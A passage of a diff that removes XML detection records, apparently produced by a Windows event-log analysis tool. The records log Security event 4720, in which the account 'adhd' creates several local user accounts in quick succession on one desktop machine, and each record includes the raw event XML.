-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:54.8846947Z'/&gt;&lt;EventRecordID&gt;4285&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Grace&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1040&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Grace&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Grace</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4279</recordid>
-            <time>2020-06-11 22:04:54.801610700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:54.8016107Z'/&gt;&lt;EventRecordID&gt;4279&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Adam&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1039&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Adam&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Adam</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4273</recordid>
-            <time>2020-06-11 22:04:54.697028100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:54.6970281Z'/&gt;&lt;EventRecordID&gt;4273&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Karen&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1038&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Karen&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Karen</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4267</recordid>
-            <time>2020-06-11 22:04:54.623558700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:54.6235587Z'/&gt;&lt;EventRecordID&gt;4267&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Donald&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1037&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Donald&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Donald</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4261</recordid>
-            <time>2020-06-11 22:04:54.530937200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:54.5309372Z'/&gt;&lt;EventRecordID&gt;4261&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Anthony&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1036&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Anthony&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Anthony</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4255</recordid>
-            <time>2020-06-11 22:04:54.440513100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:54.4405131Z'/&gt;&lt;EventRecordID&gt;4255&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Jean&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1035&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Jean&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Jean</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4249</recordid>
-            <time>2020-06-11 22:04:54.341461300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:54.3414613Z'/&gt;&lt;EventRecordID&gt;4249&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Keith&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1034&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Keith&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Keith</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4243</recordid>
-            <time>2020-06-11 22:04:54.1830200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:54.0018302Z'/&gt;&lt;EventRecordID&gt;4243&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Ruth&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1033&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Ruth&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Ruth</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4237</recordid>
-            <time>2020-06-11 22:04:53.918448700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:53.9184487Z'/&gt;&lt;EventRecordID&gt;4237&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Harold&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1032&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Harold&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Harold</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4231</recordid>
-            <time>2020-06-11 22:04:53.808575100Z</time>
-            <channel>Security</channel>
